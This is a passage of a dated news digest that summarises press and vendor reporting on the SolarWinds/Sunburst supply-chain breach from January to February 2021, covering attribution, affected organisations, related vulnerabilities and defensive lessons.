The SolarWinds hack is considered an egregious act of espionage, stealing data, and establishing unauthorized access to information technology. Thus, nations must move past jurisdictional grandstanding to develop a national cybersecurity strategy. There must be a comprehensive approach to cybersecurity that keeps the United States a step ahead of its adversaries.
Ref - CNBC
_______________________________________________________________________________________
(February 9, 2021)
What could be the purpose behind the SolarWinds hack?
The purpose of the SolarWinds hack remains largely unknown. Still, there are many reasons hackers would want to get into an organization's system, including having access to future product plans or employee and customer information held for ransom. It is also not yet clear what information, if any, hackers stole from government agencies. But the level of access appears to be deep and broad.
Ref - TechTarget
_______________________________________________________________________________________
(February 9, 2021)
SolarWinds breach has created disturbances for security worldwide
While the scope of Solorigate attack is substantial, the scale of sophisticated deception employed by malicious actors is even more significant. The SolarWinds security breach highlights the need to actively scan, monitor, and manage all software updates for organizations at the end of the digital development and supply pipeline, no matter where they come from or where they exist in the application stack.
_______________________________________________________________________________________
(February 9, 2021)
The SolarWinds hack was not inevitable
The SolarWinds hack was a major breach of national security that revealed gaps in U.S. cyber defenses. The larger question is why SolarWinds, an American company, had to turn to foreign providers for software development. A Department of Defense report about supply chains characterizes the lack of software engineers as a crisis. There’s also a shortage of cybersecurity talent in the U.S. Engineers, software developers and network engineers are among the most needed skills across the U.S.
_______________________________________________________________________________________
(February 9, 2021)
SolarWinds attack highlights the importance of the principle of least privilege
The advanced persistent threat (APT) behind the SolarWinds attack used forged authentication tokens and credentials to highly privileged Active Directory domain accounts as a persistence and escalation mechanism. This attack method has reinforced the importance of implementing least privilege, which is one of the 33 IT security principles outlined by NIST.
Ref - DarkReading
_______________________________________________________________________________________
(February 8, 2021)
Microsoft and SolarWinds having disputes over nation-state attacks
The latest investigation updates from SolarWinds and Microsoft offer differing views on how nation-state threat actors compromised SolarWinds' environment. The SolarWinds CEO claimed that threat actors got into SolarWinds' Office 365 environment first before moving to the Orion development environment. However, Microsoft said its investigation found no evidence it was attacked via the email software.
Ref - TechTarget
_______________________________________________________________________________________
(February 8, 2021)
US response to SolarWinds breach
In a formal joint statement, four U.S. agencies in charge of intelligence and cybersecurity affirmed that an advanced hacking group, likely Russian in origin, is responsible for the SolarWinds Orion software compromise. The Computer Fraud and Abuse Act (CFAA) could be used to indict Russian state hackers for trespassing in government computers or obtaining national security information. Sanctioning or indicting Russian state actors for cyber espionage, however, could set a dangerous precedent to be used against individual NSA or CIA hackers.
Ref - CFR
_______________________________________________________________________________________
(February 8, 2021)
SolarWinds' breach can lead to a larger attack
Cybersecurity experts fear the SolarWinds hack has laid the groundwork for a larger attack that the federal government is not prepared to handle. After attackers exploited vulnerabilities in SolarWinds’ computer network management software to breach federal systems, a race began to fortify cyber defenses before additional attacks damage critical infrastructure and cause economic instability.
Ref - The Washington Times
_______________________________________________________________________________________
(February 8, 2021)
SolarWinds attack is a wake-up call
SolarWinds attacks represent a shift in tactics for a supply chain attack where a nation-state has employed a new weapon for cyber-espionage. The impact of this attack shows how a high-volume commercial software product can impact many organizations simultaneously. From a US national security perspective, this attack enables the nation’s enemies to steal all manner of information, from inter-governmental communications to national secrets.
_______________________________________________________________________________________
(February 5, 2021)
NIST offers tools to defend against nation-state cyber threats
NIST's new publications provide a "roadmap" for how agencies of any size should counter increasingly advanced tradecraft from nation-state actors. Tightening access controls for non-federal agencies would improve the confidentiality of sensitive information but can also prevent the initial access for advanced persistent threats targeting government agencies.
Ref - FCW
_______________________________________________________________________________________
(February 5, 2021)
Software supply chains are at risk of more attacks like SolarWinds attack
Revelations of its full breadth and depth continue to escalate, as do the alarm bells ringing throughout government and industry. The next SolarWinds attack is a matter of when, not if - and the next breach could be far more damaging than just infiltration and espionage. SolarWinds is a wake-up call for leaders to secure their end-to-end software supply chain.
_______________________________________________________________________________________
(February 5, 2021)
SolarWinds plans for safer customer community
SolarWinds President and CEO Sudhakar Ramakrishna and cybersecurity expert and Krebs Stamos Group Founding Partner Alex Stamos revealed a plan for a safer SolarWinds and customer community. The principles for the secure enterprise includes further securing the internal environment, enhancing the product development environment, and ensuring the security and integrity of software.
_______________________________________________________________________________________
(February 5, 2021)
Microsoft: Microsoft services not used as an entry point by SolarWinds attackers
Microsoft has said that there was no indication that SolarWinds was attacked via Office 365. While data hosted in Microsoft email and other services were targeted by the hackers “post-compromise,” it had found no evidence that its services were used as an initial entry point into the systems of organizations, claiming that the attackers apparently gained privileged credentials “in some other way.”
Ref - SecurityWeek
_______________________________________________________________________________________
(February 5, 2021)
A deeper look into the massive 2020 cyberattack on the United States
Dmitri Alperovitch, the executive chair of the Silverado Policy Accelerator think tank, and co-founder and former CTO of CrowdStrike, has revealed the many ways somebody can perpetuate a cyberattack. According to him, the most surprising thing about the SolarWinds attack is the scale of it, and he estimates that it’s going to take months, potentially even years to get to all the different networks that these guys have infiltrated.
_______________________________________________________________________________________
(February 4, 2021)
Government-funded cybersecurity system In-toto could have prevented SolarWinds attacks
The cyber-security system named in-toto is aimed at providing end-to-end protection for the entire software supply pipeline. This project, already available for free, is supported by $2.2 million in grants from US federal agencies. If widely deployed, this could have blocked or minimized the damage from the SolarWinds attack.
_______________________________________________________________________________________
(February 4, 2021)
Importance of zero-trust mindset after SolarWinds breach
The recent SolarWinds attack has reinforced two key points that the industry has been advocating for a while now, defense-in-depth protections and embracing a zero-trust mindset. Defense-in-depth protections and best practices are really important because each layer of defense provides an extra opportunity to detect an attack and take action before they get closer to valuable assets. A zero-trust philosophy is also important to provide protection even when an attacker gains unauthorized access.
Ref - Microsoft
_______________________________________________________________________________________
(February 4, 2021)
Organizations should be wary of third-party providers after SolarWinds breach
Recent SolarWinds breach has proved that any company that produces software or hardware for other organizations is a potential target of supply chain attack by attackers. Nation-state actors have deep resources and the skills to penetrate even the most security-conscious firms. Even security vendors can be targets.
Ref - CSO
_______________________________________________________________________________________
(February 4, 2021)
The SolarWinds attack proves that an on-premise Active Directory is still an effective attack vector
New evidence points to attackers using well-established methods to gain initial access the old-fashioned way, through on-premises Active Directory (AD). Attackers used methods such as password guessing, password spraying, and exploiting poorly secured administrative or service credentials. They then used native Windows tools and techniques, such as Windows Management Instrumentation (WMI), to enumerate the certificate-signing capability of Microsoft Active Directory Federated Services (AD FS) and forge authentication tokens.
_______________________________________________________________________________________
(February 4, 2021)
SolarWinds chases multiple leads in the breach investigation
According to new intelligence shared by SolarWinds, UNC2452, the Russia-linked advanced persistent threat (APT) group behind the December 2020 SolarWinds cyber attacks, probably accessed SolarWinds’ systems both through a zero-day vulnerability in Microsoft Office 365 and through a compromise of user credentials.
_______________________________________________________________________________________
(February 4, 2021)
SolarWinds confirms that Office 365 email compromise played role in recent massive cyber attacks
SolarWinds CEO Sudhakar Ramakrishna has verified suspicious activity in its Office 365 environment, with a company email account compromised and used to access accounts of targeted SolarWinds staff in the business and technical roles. Hackers most likely entered SolarWinds’s environment through compromised credentials and/or a third-party application that capitalized on a zero-day vulnerability.
_______________________________________________________________________________________
(February 3, 2021)
Impact of SolarWinds attacks on security managers
With the increasing sophistication of attacks, there is a call for security managers to reduce the time of detection and response to threats. Having an incident response plan and playbook is key in protecting important customer or organizational data. Conducting assessments, having a strong communication structure with your board, and implementing strong security solutions are critical.
Ref - Aurora
_______________________________________________________________________________________
(February 3, 2021)
SolarWinds CEO: Office 365 environment was compromised in SolarWinds breach
In new details on the SolarWinds breach, it has been disclosed that nation-state threat actors first compromised a single email account and later gained access to the company's Orion platform environment. From there, the threat actors compromised the credentials of the employees, got privileged access to the Orion build environment, and then added the backdoor to software updates for the platform.
Ref - TechTarget
_______________________________________________________________________________________
(February 3, 2021)
The path of becoming secure by design after SolarWinds breach
SolarWinds breach taught several lessons to be more secure by upgrading to stronger and deeper endpoint protections, enhancing Data Loss Prevention solution, expanding Security Operations Center, and tightening firewall policies. Along with these tips, adopting zero trusts and least privilege access and addressing the possible risks associated with third-party application access are also very important.
Ref - SolarWinds
_______________________________________________________________________________________
(February 3, 2021)
Use of a backdoor implant in a SolarWinds Orion server
In early-2020, the Sophos Managed Threat Response (MTR) team was brought in to help an organization that had fallen victim to a Ragnar Locker attack. The C2s, web shell, and DLL used in that attack may not be directly related to recent SolarWinds attacks, but carries several similarities. The threat actor gained access to the webserver and installed a web shell to send commands and orchestrate the rest of the attack. A backdoored version of OrionWeb.dll was downloaded from their C2 server. Additional logic was added to authenticate the username “_system” with a dynamic password that would change every day and the digital signature of the file removed.
Ref - Sophos
_______________________________________________________________________________________
(February 3, 2021)
Findings from SolarWinds ongoing investigations
According to SolarWinds, their email account was compromised and used to programmatically access accounts of targeted SolarWinds personnel in business and technical roles. By compromising the credentials of SolarWinds employees, the threat actors were able to gain access to and exploit their Orion development environment.
Ref - SolarWinds
_______________________________________________________________________________________
(February 3, 2021)
Additional details on vulnerabilities in SolarWinds Orion and SonicWall appliances
Details have been revealed on two vulnerabilities (CVE-2021-25274 and CVE-2021-25275) in the SolarWinds Orion platform and a single vulnerability in the SolarWinds Serv-U FTP server for Windows. SolarWinds Orion Platform users can upgrade to version 2020.2.4. SolarWinds ServU-FTP users can upgrade to version 15.2.2 Hotfix 1. Similarly, for the zero-day vulnerability found in SonicWall SMA 100 Series appliances, the company has released a patch to firmware version SMA 10.2.0.5-29sv.
Ref - Rapid7
_______________________________________________________________________________________
(February 3, 2021)
Unfolding the SolarWinds breach
Pushkar Tiwari, Director Development at Symantec Enterprise Division of Broadcom Inc., has revealed the entire episode about what, when, why, and how of the SolarWinds hack. Tiwari has closely followed and analyzed the modus operandi of the hack.
Ref - CISO MAG
_______________________________________________________________________________________
(February 3, 2021)
Three new severe security vulnerabilities identified impacting SolarWinds products
Three severe security vulnerabilities have been identified impacting SolarWinds products. Two of the flaws (CVE-2021-25274 and CVE-2021-25275) were identified in the SolarWinds Orion Platform, while a third separate weakness (CVE-2021-25276) was found in the company's Serv-U FTP server for Windows.
_______________________________________________________________________________________
(February 3, 2021)
‘Severe’ SolarWinds vulnerabilities allow hackers to take over servers
A new set of three “severe” vulnerabilities have been discovered in the SolarWinds Orion platform. These issues could allow an attacker full remote code execution, access to credentials for recovery, and the ability to read, write to or delete any file on the system.
_______________________________________________________________________________________
(February 3, 2021)
Chinese hackers suspected to be involved in SolarWinds breach
It is suspected that Chinese hackers exploited a flaw in software made by SolarWinds Corp to help break into U.S. government computers last year, marking a new twist in a sprawling cybersecurity breach that U.S. lawmakers have labeled a national security emergency. It has been found that the National Finance Center, a federal payroll agency inside the U.S. Department of Agriculture was among the affected organizations.
Ref - Reuters
_______________________________________________________________________________________
(February 3, 2021)
Suspected Chinese hackers used SolarWinds bug to attack additional federal agencies
Suspected Chinese hackers exploited a flaw in software made by SolarWinds Corp to help break into US government computers last year. The attackers used computer infrastructure and hacking tools previously deployed by state-backed Chinese cyberspies. SolarWinds said it was aware of a single customer that was compromised by the second set of hackers but cannot say conclusively who was responsible.
Ref - The Straits Times
_______________________________________________________________________________________
(February 2, 2021)
New revelations deepen the fears related to third-party software use
The new revelation about the involvement of Chinese hackers underscores the seemingly impossible task that organizations face in dealing with not only their own security issues but also potential exposure from the countless third-party companies they partner with. It is said that the Chinese hackers exploited the vulnerability only after already breaking into a network by some other means. They then used the flaw to bore deeper.
Ref - Wired
_______________________________________________________________________________________
(February 2, 2021)
Hackers stayed inside SolarWinds email system for almost 9 months
The newly appointed chief executive of SolarWinds Corp. is still trying to unravel how his company became a primary vector for hackers in a massive attack revealed last year. According to him, pieces of evidence are emerging that they were lurking in the company’s Office 365 email system for months. The company is still trying to understand how the hackers first got into the company’s network and when exactly that happened.
Ref - The Wall Street Journal
_______________________________________________________________________________________
(February 2, 2021)
Learnings from SolarWinds breach - Singapore CERT
Singapore CERT has provided several key takeaways and guidelines to prevent future supply-chain attacks like SolarWinds. First, it is likely that supply-chain attacks will continue to occur, therefore organizations should make every effort to improve visibility. Second, the breach demonstrates the asymmetric nature of the cybersecurity threat, which demands a continuous need to enhance and develop their cybersecurity capabilities. The breach also highlights the importance of the international community’s efforts in establishing clear rules and norms to promote responsible behavior in cyberspace.
Ref - CSA
_______________________________________________________________________________________
(February 2, 2021)
A U.S. federal payroll agency breached by exploiting SolarWinds flaw
The FBI has discovered that the National Finance Center, a U.S. Department of Agriculture (USDA) federal payroll agency was compromised by exploiting a SolarWinds Orion software flaw. Even though both the FBI and the USDA declined to provide further comment, the latter confirmed that it had suffered a data breach.
Ref - Bleeping Computer
_______________________________________________________________________________________
(February 1, 2021)
U.S. court system goes paper for sensitive documents after SolarWinds hack
The US court system has banned the electronic submission of legal documents in sensitive cases out of concern that Russian hackers have compromised the filing system. In an extraordinary order handed down to all federal courts, any documents that contain information that is likely to be of interest to the intelligence service of a foreign government will now have to be physically printed out and provided in a physical format.
Ref - The Register
_______________________________________________________________________________________
(February 1, 2021)
SolarWinds breach put light on an old supply-chain incident
In the wake of the recent SolarWinds attacks, Members of Congress are demanding the U.S. National Security Agency (NSA) reveal information about an old (2015) Juniper Networks supply-chain delivery breach. A chief bone of contention among lawmakers is the allegation that the NSA’s “Dual_EC_DRBG” algorithm, submitted to the National Institute of Standards and Technology (NIST), contained an encryption backdoor for the spy agency.
Ref - Threatpost
_______________________________________________________________________________________
(February 1, 2021)
How to prevent the next SolarWinds-kind attack?
First cybersecurity professionals should take care of the “easy” stuff, such as keeping their software updated and, where necessary, adding patches. Second, companies must build a culture of security within their product design. Finally, any robust third-party security program must involve a high level of automation, and the only practical way to do this is through implementing automation.
Ref - Security Boulevard
_______________________________________________________________________________________
(January 31, 2021)
A third of victims were not using SolarWinds software
Almost a third of the victims of the recent wave of massive attack did not use the SolarWinds software, which was previously thought to be the main gateway for the attackers. The serious cyberattack on government institutions and companies in the USA is drawing ever wider circles. Investigators have found evidence that the alleged espionage operation went well beyond the compromise of the small software provider SolarWinds.
Ref - City Telegraph
_______________________________________________________________________________________
(January 29, 2021)
A fifth of Sunburst backdoor victims are from the manufacturing sector
Nearly a fifth of organizations hit by the Sunburst backdoor emanating from the SolarWinds supply chain attack is from the manufacturing sector, a new analysis from Kaspersky has revealed. While researchers have already uncovered technical details of the Sunburst backdoor that was embedded in the SolarWinds incident late last year, information on the full impact of the attack is still being investigated.
Ref - Infosecurity Magazine
_______________________________________________________________________________________
(January 29, 2021)
SolarWinds' implications for IoT and OT
In the new episode of Talos Takes, experts from Cisco Talos provide details about how the SolarWinds attack has wide-reaching consequences in the internet-of-things (IoT) and operational technology (OT) spaces.
_______________________________________________________________________________________
(January 29, 2021)
Lessons learned from SolarWinds breach
SolarWinds attacks have left several important learnings behind, such as new binaries should be checked and verified, even once they are signed; audit, monitor, and segregate the app/service accounts for cloud environments as much as possible; deploy a secure System Development Life Cycle (SDLC) process to catch the attackers in real-time and prevent the damage, and use stronger passwords on code management platforms.
Ref - TechRepublic
_______________________________________________________________________________________
(January 29, 2021)
Life after the SolarWinds supply chain attack
After the disclosure of the SolarWinds attack, the first step to be taken by any organization should be to eliminate the immediate risk. If they use the affected software, they should have already followed the CyberSecurity Infrastructure Security Agency (CISA)’s directions to disconnect and decommission any instances of SolarWinds Orion software. Even after a complete reset of all accounts, do an additional top-to-bottom security review. In addition, examine all of the relationships, both between internal servers and external third parties who might have access to the networks and systems.
Ref - Security Boulevard
_______________________________________________________________________________________
(January 29, 2021)
SolarWinds breach spooks tech firms into rechecking code
Haunted by the far-reaching implications of the SolarWinds supply chain attack, software company executives have ordered sweeping new assessments of their products, looking for any signs of suspicious activity, code anomalies, or exploits. If or when more attacks are uncovered, end-user organizations will need to apply the lessons learned from SolarWinds and prepare to take swift and decisive action.
Ref - SC Media
_______________________________________________________________________________________
(January 29, 2021)
SolarWinds breach raises questions about the appropriate response to such attacks
The sprawling reach of the SolarWinds malware attack inspires new questions about the appropriate response from private sector organizations to cyberattacks from nation-state hackers. Many enterprises, particularly those in tech and security, have tremendous insight into the workings of their own systems, which some believe puts them in a particularly unique position to hack back at attackers.
Ref - SC Media
_______________________________________________________________________________________
(January 29, 2021)
Suspected Russian hack extends far beyond SolarWinds software
Investigators examining the massive attack on the U.S. government and businesses claim that they have found concrete evidence the suspected Russian espionage operation went far beyond the compromise of the small software vendor publicly linked to the attack. Close to a third of the victims didn’t run the SolarWinds Corp. software. The revelation is fueling concern that the episode exploited vulnerabilities in business software used daily by millions.
_______________________________________________________________________________________
(January 29, 2021)
The SolarWinds hack is even worse than anyone thought
The SolarWinds hackers didn't go for the usual credit card numbers and email addresses that most cyberthieves seek. Instead, the hackers went for much higher-value internal information: emails with corporate and government secrets, the source code underlying Microsoft software, and the like. The attack also undermines the entire structure of cybersecurity in the United States, with its patchwork of government agencies, big-name security firms, thousands of smaller outside vendors, and internal IT department security efforts.
Ref - Fortune
_______________________________________________________________________________________
(January 29, 2021)
What went wrong during SolarWinds attacks, and how can we fix it
When FireEye went public with its SolarWinds news, neither the NSA, the Pentagon’s Cyber Command, nor any other U.S. intelligence or cyber agency had detected the attack, although it had likely been underway for months. FireEye wasn’t legally obligated to inform anyone - publicly or privately - about its discovery. The U.S. does not require independent research firms to share their findings of cyberthreats with government agencies, even if they constitute a potential national security threat.
_______________________________________________________________________________________
(January 29, 2021)
SolarWinds attackers hit several strategic targets including cyber and tech firms
For hackers, cybersecurity companies represent the gatekeepers guarding the computer networks they so desperately wish to exploit. Also, cybersecurity and technology companies often have remote access to customers’ computer networks, potentially giving hackers entry to their clients and partners. Such digital supply chain hacks are an efficient method to corral hundreds, if not thousands, of potential victims.
_______________________________________________________________________________________
(January 29, 2021)
Web Supply Chain may be next in the line for State-sponsored attacks
Industry experts have pointed out that blind trust and long, complex chains are two key ingredients for any successful supply chain attack like the SolarWinds attack. These two are available in nearly every Web application and website that is online right now. Any breach in one of the ‘maintainer’ accounts can trigger a global Web supply chain attack and affect millions of organizations.
_______________________________________________________________________________________
(January 29, 2021)
Thirty percent of SolarWinds hack victims didn't run the software
Brandon Wales, the acting director of the Cybersecurity and Infrastructure Security Agency, has recently revealed that around 30 percent of computers previously thought to be hacked via SolarWinds didn't even run the software. Hackers linked to the attack also seem to have broken into government and private accounts by guessing passwords and exploiting issues in Microsoft's cloud-based Office software used by millions of people.
_______________________________________________________________________________________
(January 29, 2021)
A fifth of Sunburst backdoor victims belong to the Manufacturing industry
A new analysis from Kaspersky has revealed that nearly a fifth of organizations hit by the Sunburst backdoor are from the manufacturing sector. Based on a list of nearly 2000 readable and attributable domains, it was revealed that around a third (32.4%) of all victims were industrial organizations. The most impacted sector is manufacturing (18.11% of all victims), followed by utilities (3.24%), construction (3.03%), transportation and logistics (2.97%), and oil and gas (1.35%).
_______________________________________________________________________________________
(January 29, 2021)
More SolarWinds type of attacks are expected in future
More sophisticated and complicated attacks like SolarWinds or the same type can be expected sooner or later. Experts also said that these attacks are going to continue to get more sophisticated. SolarWinds is a moment of reckoning in the security industry, and this is going to be the new norm.
Ref - ZDNet
_______________________________________________________________________________________
(January 28, 2021)
Most tools that detected the SolarWinds malware also failed in some way
The actors behind the SolarWinds hack easily evaded all the major cybersecurity technologies available in the market. For endpoint detection and response (EDR), the threat actor seems to have tested its malware against all the major players. It knew which ones could detect it, which ones it could turn off, and which ones it could not evade. And the same can be said for automated threat hunting platforms, and internal network monitoring tools as well.
_______________________________________________________________________________________
(January 28, 2021)
SolarWinds attackers abused weak access policies for infiltrating inside networks
Service accounts may have played a bigger role than originally anticipated in the SolarWinds hack that compromised the networks of a number of U.S. government agencies and private organizations. Attackers may have used SolarWinds’ service accounts with high-level privileges to conduct lateral movement across the SolarWinds network and thereby gain access to more enterprise resources.
Ref - Toolbox
_______________________________________________________________________________________
(January 28, 2021)
The technical attack flow of SunBurst malware
Using the MITRE ATT&CK framework, researchers have provided the most likely technical attack flow of SunBurst (the malware installed on SolarWinds’ Orion product) attack. The chain of events included initial access (On-Prem), discovery, credential access, privilege escalation, defense evasion, and lateral movement, and finally exfiltration. Check Point researchers have revealed the details of each of these steps.
Ref - CheckPoint
_______________________________________________________________________________________
(January 28, 2021)
Why does the SolarWinds breach matter so much?
The SolarWinds breach was like no other of its kind. The breach is almost endless in scale due to the implementation and usage of the compromised SolarWinds product and code across many organizations. This makes it one of the most powerful and successful hacks in history.
_______________________________________________________________________________________
(January 28, 2021)
SolarWinds hack proves that there is no ‘Finish Line’ with security
Stephen Ayoub, president of the solution provider powerhouse Ahead, has insisted that the massive SolarWinds hack has proved that there is no “finish line” to any organization’s cybersecurity strategy. Several other IT leaders across the board are echoing similar strategies regarding the SolarWinds hack.
_______________________________________________________________________________________
(January 28, 2021)
The Story of a SolarWinds Attack Victim
Marcin Kleczynski, the chief executive officer of Malwarebytes, sheds some light on the series of quick and consequential decisions that hundreds of company and agency heads across the country have been forced to make in the aftermath of the SolarWinds breach by suspected Russian hackers.
Ref - Bloomberg
_______________________________________________________________________________________
(January 27, 2021)
CISA Malware Analysis on Supernova
CISA has released a malware analysis report on Supernova malware affecting unpatched SolarWinds Orion software. The report contains indicators of compromise (IOCs) and analyzes several malicious artifacts. Supernova is not part of the SolarWinds supply chain attack described in Alert AA20-352A.
Ref - US-CERT
_______________________________________________________________________________________
(January 27, 2021)
SolarWinds Attacks Highlight Advantage of Indicators of Behavior for Early Detection
The security community is not bound to protecting organizations using IOCs alone. They can turn to what’s known as Indicators of Behavior (IOBs). Because, the malicious actors uniquely compiled their code to make sure it doesn’t match with any known file hashes or malware signatures out there, rendering IOCs ineffective for detection and impossible for signature-based anti-malware solutions.
Ref - Security Boulevard
_______________________________________________________________________________________
(January 27, 2021)
Hardening active directory against SolarWinds-type attacks
The SolarWinds attackers took advantage of Active Directory to gain a foothold inside the targeted networks. There are several means with Microsoft’s Active Directory (AD) to identify these attack techniques used by SolarWinds attackers and prevent them from happening. This includes User account settings, Domain password policies, Active Directory backup policies, and a few take care areas around Old Group Policy Preferences credentials, etc.
Ref - CSO Online
_______________________________________________________________________________________
(January 27, 2021)
Hundreds of Industrial organizations received Sunburst malware
Kaspersky’s industrial cybersecurity researchers have analyzed a list of nearly 2,000 domains impacted by Sunburst and estimated that roughly 32% of them were associated with industrial organizations. A majority of them are organizations in the manufacturing sector, followed by utilities, construction, transportation and logistics, oil and gas, mining, and energy.
_______________________________________________________________________________________
(January 27, 2021)
Fidelis targeted by SolarWinds hackers via Orion
Fidelis has disclosed and confirmed that hq[.]fidelis is included in the growing list of domains known to have been targeted by the SolarWinds attackers. Fidelis had installed an evaluation copy of the trojanized SolarWinds Orion software on one of their machines in May 2020 as part of a software evaluation.
_______________________________________________________________________________________
(January 26, 2021)
Kaspersky researchers reveal SunBurst industrial victims
Kaspersky researchers have analyzed all available decoded internal domain names obtained from DNS names generated by the SunBurst DomainName Generation Algorithm using some publicly available lists and third-party lists. The geographical distribution of the industrial organizations is broad and covers almost the entire world, from North America to APAC.
Ref - Kaspersky
_______________________________________________________________________________________
(January 26, 2021)
Mimecast confirms SolarWinds' hackers breached company
Mimecast has confirmed that the threat actor accessed, and potentially exfiltrated, certain encrypted service account credentials created by customers hosted in the United States and the United Kingdom. Customers hosted in the United States and the United Kingdom have been advised to take precautionary steps to reset their credentials.
_______________________________________________________________________________________
(January 26, 2021)
Four new victims disclosed in SolarWinds breach
As most experts predicted last month, the fallout from the SolarWinds supply chain attack is getting bigger as time passes by, and companies had the time to audit internal networks and DNS logs. Now, four new cyber-security vendors, Mimecast, Palo Alto Networks, Qualys, and Fidelis, have added their names to the list of companies that have installed trojanized versions of the SolarWinds Orion app.
Ref - ZDNet
_______________________________________________________________________________________
(January 26, 2021)
The SolarWinds breach can be called an act of war?
Members of Congress on both sides of the aisle have posed the question of whether the recent SolarWinds cyberattack was an act of war. Democratic Sen. Dick Durbin and Republican Sen. Mitt Romney shared these concerns. States must recognize such an aggressive act for what it is and be prepared to respond to such threats in accordance with international law.
_______________________________________________________________________________________
(January 26, 2021)
SolarWinds breach exposed significant weaknesses of incident response
The massive SolarWinds breach exposed some significant weaknesses in companies’ incident response practices. Lack of traffic analysis and behavior logs hinders the incident response team's ability to track down the source of the attack and shut it down, cut off the attackers' communication channels, and determine how far the attack has spread.
Ref - DataCenter Knowledge
_______________________________________________________________________________________
(January 26, 2021)
Important lessons of Solarwinds breach
The SolarWinds hack hasn’t really gotten the attention it deserves because it happened during the chaos after the presidential election, but it’s a big deal. And it raises a lot of questions about how to respond to such a massive attack and the responsibility of the private sector when it comes to national security.
Ref - The Verge
_______________________________________________________________________________________
(January 26, 2021)
SUNSPOT was used to inject the SUNBURST backdoor into the Orion app
An analysis revealed that threat actors leveraged SUNSPOT to automatically inject the SUNBURST backdoor into the Orion app build process after executing the manual supply chain attack. It is a software often used by developers to assemble smaller components to larger software applications. Besides, it was considered the third malware strain, followed by SUNBURST (Solorigate) & TEARDROP.
Ref - Secureblink
_______________________________________________________________________________________
(January 26, 2021)
How the massive SolarWinds hack went down
The SolarWinds hack was and really is and continues to be one of the biggest espionage campaigns recently discovered. Microsoft, Google and several U.S. government agencies were among those compromised by the intrusion, and the repercussions of the SolarWinds hack are still being unraveled.
_______________________________________________________________________________________
(January 26, 2021)
SonicWall warns customers about zero-day vulnerabilities, may be linked to SolarWinds attacks
SonicWall has identified a coordinated attack on its internal systems by highly sophisticated threat actors. The attackers exploited probable zero-day vulnerabilities on certain SonicWall secure remote access products. Although there is currently no link between the attack against SonicWall and the SolarWinds or the Azure attacks, however, SonicWall is the third cybersecurity vendor to recently announcing a security breach after FireEye and Malwarebytes.
_______________________________________________________________________________________
(January 25, 2021)
How should affected businesses respond to the SolarWinds hack?
The first thing businesses should do is to make certain that their networks are as internally secure as possible. That means reconfiguring network assets to be as isolated as possible. Review employee security practices, procedures and conduct a limited security audit, and engage in defensive measures.
_______________________________________________________________________________________
(January 25, 2021)
Stage two of the SUNBURST backdoor revealed 23 more targets
According to researchers, the "STAGE2" flag in SUNBURST's DNS beacons can be used to reveal additional SUNBURST victims that were singled out as interesting targets by the threat actors. SUNBURST backdoors never made it past "Stage 1 operation", where the backdoor encoded the internal AD domain name and installed security products into DNS requests.
Ref - NETRESEC
_______________________________________________________________________________________
(January 25, 2021)
SolarWinds hack leaves security researchers clueless about future risks
The SolarWinds attackers have demonstrated sophistication and complex tradecraft in the intrusions. Out of hundreds of targeted organizations, it will take years to know for certain which networks the Russians control and which ones they just occupy. Although the consensus seems to be that the SolarWinds breach was straight-up reconnaissance, the truth is that it is yet not known if this was actually an attack or not.
_______________________________________________________________________________________
(January 25, 2021)
Qualys confirmed as one of the targets in SolarWinds attack
A researcher has released a list of 23 new, alleged targets of the unprecedented SolarWinds hacks that formed a huge espionage campaign first revealed in December. Amongst the confirmed newly-discovered targets are Qualys, a $5 billion market cap cybersecurity company on the Nasdaq, and the Virginia State Corporation Commission, which regulates businesses in the region.
Ref - Forbes
_______________________________________________________________________________________
(January 25, 2021)
Protecting businesses from Supply Chain attacks
SolarWinds attackers used a total of four malware strains: Sunspot, Sunburst (Solorigate), Teardrop, and Raindrop. These malware strains were used in a sophisticated sequence of escalated attacks. Security teams must scan their IT environments for all four of these strains of malware. In addition, organizations should take several additional security measures to reduce their exposure to risk.
_______________________________________________________________________________________
(January 25, 2021)
SolarWinds breach exposed supply chain weaknesses
The elite Russian hackers who gained access to computer systems of federal agencies last year didn't bother trying to break one by one into the networks of each department. Instead, they got inside by sneaking malicious code into a software update pushed out to thousands of government agencies and private companies.
Ref - The Economic Times
_______________________________________________________________________________________
(January 25, 2021)
The Russian hack of US agencies exposed supply chain weaknesses
U.S. officials and cybersecurity experts have sounded the alarm for years about a problem that has caused the SolarWinds attack havoc, including billions of dollars in financial losses, while also defying easy solutions from the government and private sector. Part of the appeal of a supply chain attack for hackers is that it's a "low-hanging fruit". The U.S. organizations are often not appreciating or understanding how dispersed their networks actually are.
_______________________________________________________________________________________
(January 25, 2021)
SolarWinds, Mimecast hacks highlights risks of third-party, supply-chain compromises
The Mimecast hack provides a glimpse of threat actors innovating to take full advantage of fresh opportunities to maliciously manipulate digital certificates. Mimecast supplies email security systems to some 36,100 companies, many of whom use Office 365 or G Suite. By either stealing or spoofing Mimecraft’s certificate, the threat actors could gain access to inbound and outbound mail flows, intercept that traffic, and possibly infiltrate Mimecast’s customers’ Microsoft 365 Exchange Web Services, as well.
_______________________________________________________________________________________
(January 24, 2021)
Lessons learned from SolarWinds breach
Three networking experts (Steve Garson, Tom Nolle, and Tom Hollingsworth) explored different lessons learned from SolarWinds. They provide guidance on how to shrink attack surfaces, overlooked management, and monitoring practices, and how something seemingly harmless could lead to trouble.
Ref - Tech Target
_______________________________________________________________________________________
(January 22, 2021)
Disaster recovery steps after SolarWinds breach
For organizations that were affected by the SolarWinds breach, the first step would be to get the latest updates of the Orion software that have been sanitized. Next, they need to identify all of the systems that were impacted as well as those systems that interacted with them. They should evaluate DR plans to see if there are contingencies for the impacted systems and if there are considerations enacting them. Finally, it would be prudent to rebuild all of the systems that were affected as well as any systems that were connected to them in order to ensure that any undetected presence of the malware is actually gone.
Ref - Petri
_______________________________________________________________________________________
(January 22, 2021)
The SolarWinds attack can affect control systems as well
Much of the initial discourse around the SolarWinds cyberattack focused on its impact on the affected Information Technology (IT) systems. However, this overlooks an equally destructive yet unexamined operational technology (OT) portion of the attack, and much of the OT impact may not be seen for months or longer.
Ref - Lawfare
_______________________________________________________________________________________
(January 22, 2021)
SolarWinds hackers avoided reuse of attack infrastructures
The Sunburst espionage campaign that breached FireEye and several government agencies were devious about operational security. To protect useful attack vectors through SolarWinds, Microsoft, and VMWare, the hackers made every effort not to reuse infrastructures or settings or to tie one stage of the attack to another.
Ref - SC Media
_______________________________________________________________________________________
(January 22, 2021)
How Sunburst sent data back to its operators?
